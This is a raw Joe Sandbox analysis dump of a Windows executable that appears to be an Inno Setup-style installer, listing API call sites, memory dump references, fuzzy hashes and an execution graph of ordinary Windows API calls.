                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                        • API String ID: 4190037839-2401316094
                                                                                                                                        • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                        • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                        • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                        • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1694776339-0
                                                                                                                                        • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                        • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                        • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                        • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                          • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                        • API String ID: 1044490935-665933166
                                                                                                                                        • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                        • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                                                        • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                        • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                        • LocalFree.KERNEL32(005EBC20,00000000,00401AB4), ref: 00401A1B
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,005EBC20,00000000,00401AB4), ref: 00401A3A
                                                                                                                                        • LocalFree.KERNEL32(005ECC20,?,00000000,00008000,005EBC20,00000000,00401AB4), ref: 00401A79
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                        • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3782394904-0
                                                                                                                                        • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                        • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                        • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                        • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitMessageProcess
                                                                                                                                        • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                        • API String ID: 1220098344-1503883590
                                                                                                                                        • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                        • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                        • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                        • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 262959230-0
                                                                                                                                        • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                        • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                        • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                        • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID: )q@
                                                                                                                                        • API String ID: 3660427363-2284170586
                                                                                                                                        • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                        • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                                                        • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                        • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                                                        Strings
                                                                                                                                        • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                                                        • Setup, xrefs: 00409CAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                                                        • API String ID: 2030045667-3271211647
                                                                                                                                        • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                        • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                                                        • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                        • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                                                        • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CommandHandleLineModule
                                                                                                                                        • String ID: U1hd.@
                                                                                                                                        • API String ID: 2123368496-2904493091
                                                                                                                                        • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                        • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                        • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                        • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1458359878-0
                                                                                                                                        • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                        • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                        • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                        • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:16%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:4.6%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:85
                                                                                                                                        execution_graph 49968 40cd00 49969 40cd12 49968->49969 49970 40cd0d 49968->49970 49972 406f48 CloseHandle 49970->49972 49972->49969 49973 492848 49974 49287c 49973->49974 49975 49287e 49974->49975 49976 492892 49974->49976 50119 446f9c 18 API calls 49975->50119 49979 4928ce 49976->49979 49980 4928a1 49976->49980 49978 492887 Sleep 50039 4928c9 49978->50039 49985 49290a 49979->49985 49986 4928dd 49979->49986 50109 446ff8 49980->50109 49984 4928b0 49987 4928b8 FindWindowA 49984->49987 49991 492919 49985->49991 49992 492960 49985->49992 49988 446ff8 18 API calls 49986->49988 50113 447278 49987->50113 49990 4928ea 49988->49990 49994 4928f2 FindWindowA 49990->49994 50120 446f9c 18 API calls 49991->50120 49998 4929bc 49992->49998 49999 49296f 49992->49999 49996 447278 5 API calls 49994->49996 49995 492925 50121 446f9c 18 API calls 49995->50121 50052 492905 49996->50052 50006 492a18 49998->50006 50007 4929cb 49998->50007 50124 446f9c 18 API calls 49999->50124 50001 492932 50122 446f9c 18 API calls 50001->50122 50002 49297b 50125 446f9c 18 API calls 50002->50125 50005 49293f 50123 446f9c 18 API calls 50005->50123 50017 492a52 50006->50017 50018 492a27 50006->50018 50129 446f9c 18 API calls 50007->50129 50008 492988 50126 446f9c 18 API calls 50008->50126 50012 49294a SendMessageA 50016 447278 5 API calls 50012->50016 50013 4929d7 50130 446f9c 18 API calls 50013->50130 50015 492995 50127 446f9c 18 API calls 50015->50127 50016->50052 50026 492a61 50017->50026 50027 492aa0 50017->50027 50021 446ff8 18 API calls 50018->50021 50019 4929e4 50131 446f9c 18 API calls 50019->50131 50024 492a34 50021->50024 50023 4929a0 PostMessageA 50128 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50023->50128 50031 492a3c RegisterClipboardFormatA 50024->50031 50025 4929f1 50132 446f9c 18 API calls 50025->50132 50134 446f9c 18 API calls 50026->50134 50035 492aaf 50027->50035 50041 492af4 50027->50041 50032 447278 5 API calls 50031->50032 50032->50039 50033 4929fc SendNotifyMessageA 50133 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50033->50133 50034 492a6d 50135 446f9c 18 API calls 50034->50135 50137 446f9c 18 API calls 50035->50137 50159 403420 50039->50159 50040 492a7a 50136 446f9c 18 API calls 50040->50136 50046 492b48 50041->50046 50047 492b03 50041->50047 50042 492abb 50138 446f9c 18 API calls 50042->50138 50045 492a85 SendMessageA 50049 447278 5 API calls 50045->50049 50056 492baa 50046->50056 50057 492b57 50046->50057 50141 446f9c 18 API calls 50047->50141 50048 492ac8 50139 446f9c 18 API calls 50048->50139 50049->50052 50052->50039 50053 492b0f 50142 446f9c 18 API calls 50053->50142 50055 492ad3 PostMessageA 50140 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50055->50140 50064 492bb9 50056->50064 50065 492c31 50056->50065 50060 446ff8 18 API calls 50057->50060 50058 492b1c 50143 446f9c 18 API calls 50058->50143 50062 492b64 50060->50062 50145 42e394 SetErrorMode 50062->50145 50063 492b27 SendNotifyMessageA 50144 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50063->50144 50068 446ff8 18 API calls 50064->50068 50073 492c40 50065->50073 50074 492c66 50065->50074 50070 492bc8 50068->50070 50069 492b71 50071 492b87 GetLastError 50069->50071 50072 492b77 50069->50072 50148 446f9c 18 API calls 50070->50148 50075 447278 5 API calls 50071->50075 50076 447278 5 API calls 50072->50076 50153 446f9c 18 API calls 50073->50153 50083 492c98 50074->50083 50084 492c75 50074->50084 50077 492b85 50075->50077 50076->50077 50080 447278 5 API calls 50077->50080 50079 492c4a FreeLibrary 50154 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50079->50154 50080->50039 50092 492ca7 50083->50092 50098 492cdb 50083->50098 50088 446ff8 18 API calls 50084->50088 50085 492bdb GetProcAddress 50086 492c21 50085->50086 50087 492be7 50085->50087 50152 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50086->50152 50149 446f9c 18 API calls 50087->50149 50090 492c81 50088->50090 50096 492c89 CreateMutexA 50090->50096 50155 48ccc8 18 API calls 50092->50155 50093 492bf3 50150 446f9c 18 API calls 50093->50150 50096->50039 50097 492c00 50101 447278 5 API calls 50097->50101 50098->50039 50157 48ccc8 18 API calls 50098->50157 50100 492cb3 50102 492cc4 OemToCharBuffA 50100->50102 50103 492c11 50101->50103 50156 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50102->50156 50151 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50103->50151 50106 492cf6 50107 492d07 CharToOemBuffA 50106->50107 50158 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50107->50158 50110 447000 50109->50110 50163 436078 50110->50163 50112 44701f 50112->49984 50114 447280 50113->50114 50217 4363e0 VariantClear 50114->50217 50116 4472a3 50117 4472ba 50116->50117 50218 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50116->50218 50117->50039 50119->49978 50120->49995 50121->50001 50122->50005 50123->50012 50124->50002 50125->50008 50126->50015 50127->50023 50128->50052 50129->50013 50130->50019 50131->50025 50132->50033 50133->50039 50134->50034 50135->50040 50136->50045 50137->50042 50138->50048 50139->50055 50140->50052 50141->50053 50142->50058 50143->50063 50144->50039 50219 403738 50145->50219 50148->50085 50149->50093 50150->50097 50151->50052 50152->50052 50153->50079 50154->50039 50155->50100 50156->50039 50157->50106 50158->50039 50161 403426 50159->50161 50160 40344b 50161->50160 50162 402660 4 API calls 50161->50162 50162->50161 50164 436084 50163->50164 50174 4360a6 50163->50174 50164->50174 50183 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50164->50183 50165 436129 50192 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50165->50192 50167 436111 50187 403494 50167->50187 50168 436105 50168->50112 50169 4360f9 50178 403510 4 API calls 50169->50178 50170 4360ed 50184 403510 50170->50184 50171 43611d 50191 4040e8 18 API calls 50171->50191 50174->50165 50174->50167 50174->50168 50174->50169 50174->50170 50174->50171 50177 43613a 50177->50112 50182 436102 50178->50182 50180 436126 50180->50112 50182->50112 50183->50174 50193 4034e0 50184->50193 50188 403498 50187->50188 50189 4034ba 50188->50189 50190 402660 4 API calls 50188->50190 50189->50112 50190->50189 50191->50180 50192->50177 50198 4034bc 50193->50198 50195 4034f0 50203 403400 50195->50203 50199 4034c0 50198->50199 50200 4034dc 50198->50200 50207 402648 50199->50207 50200->50195 50204 403406 50203->50204 50205 40341f 50203->50205 50204->50205 50212 402660 50204->50212 50205->50112 50208 40264c 50207->50208 50210 402656 50207->50210 50208->50210 50211 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50208->50211 50210->50195 50211->50210 50213 402664 50212->50213 50214 40266e 50212->50214 50213->50214 50216 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50213->50216 50214->50205 50214->50214 50216->50214 50217->50116 50218->50117 50220 40373c LoadLibraryA 50219->50220 50220->50069 54086 498ba8 54144 403344 54086->54144 54088 498bb6 54147 4056a0 54088->54147 54090 498bbb 54150 40631c GetModuleHandleA GetProcAddress 54090->54150 54094 498bc5 54158 40994c 54094->54158 54425 4032fc 54144->54425 54146 403349 GetModuleHandleA GetCommandLineA 54146->54088 54148 4056db 54147->54148 54426 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54147->54426 54148->54090 54151 406338 54150->54151 54152 40633f GetProcAddress 54150->54152 54151->54152 54153 406355 GetProcAddress 54152->54153 54154 40634e 54152->54154 54155 406364 SetProcessDEPPolicy 54153->54155 54156 406368 54153->54156 54154->54153 54155->54156 54157 4063c4 6FDA1CD0 54156->54157 54157->54094 54427 409024 54158->54427 54425->54146 54426->54148 54428 408cbc 5 API calls 54427->54428 54429 409035 54428->54429 54430 4085dc GetSystemDefaultLCID 54429->54430 54433 408612 54430->54433 54431 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54431->54433 54432 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54432->54433 54433->54431 54433->54432 54434 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54433->54434 54438 408674 54433->54438 54434->54433 54435 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54435->54438 54436 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54436->54438 54437 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54437->54438 54438->54435 54438->54436 54438->54437 54439 4086f7 54438->54439 54440 403420 4 API calls 54439->54440 54441 408711 54440->54441 54442 408720 GetSystemDefaultLCID 54441->54442 54499 408568 GetLocaleInfoA 54442->54499 54445 403450 4 API calls 54446 408760 54445->54446 54447 408568 5 API calls 54446->54447 54448 408775 54447->54448 54449 408568 5 API calls 54448->54449 54450 408799 54449->54450 54505 4085b4 GetLocaleInfoA 54450->54505 54453 4085b4 GetLocaleInfoA 54454 4087c9 54453->54454 54455 408568 5 API calls 54454->54455 54456 4087e3 54455->54456 54457 4085b4 GetLocaleInfoA 54456->54457 54458 408800 54457->54458 54500 4085a1 54499->54500 54501 40858f 54499->54501 54503 403494 4 API calls 54500->54503 54502 4034e0 4 API calls 54501->54502 54504 40859f 54502->54504 54503->54504 54504->54445 54506 4085d0 54505->54506 54506->54453 55864 42f520 55865 42f52b 55864->55865 55866 42f52f NtdllDefWindowProc_A 55864->55866 55866->55865 50221 416b42 50222 416bea 50221->50222 50223 416b5a 50221->50223 50240 41531c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50222->50240 50225 416b74 SendMessageA 50223->50225 50226 416b68 50223->50226 50236 416bc8 50225->50236 50227 416b72 CallWindowProcA 50226->50227 50228 416b8e 50226->50228 50227->50236 50237 41a058 GetSysColor 50228->50237 50231 416b99 SetTextColor 50232 416bae 50231->50232 50238 41a058 GetSysColor 50232->50238 50234 416bb3 SetBkColor 50239 41a6e0 GetSysColor CreateBrushIndirect 50234->50239 50237->50231 50238->50234 50239->50236 50240->50236 55867 4358e0 55868 4358f5 55867->55868 55872 43590f 55868->55872 55873 4352c8 55868->55873 55882 435312 55873->55882 55883 4352f8 55873->55883 55874 403400 4 API calls 55875 435717 55874->55875 55875->55872 55886 435728 LocalAlloc TlsSetValue 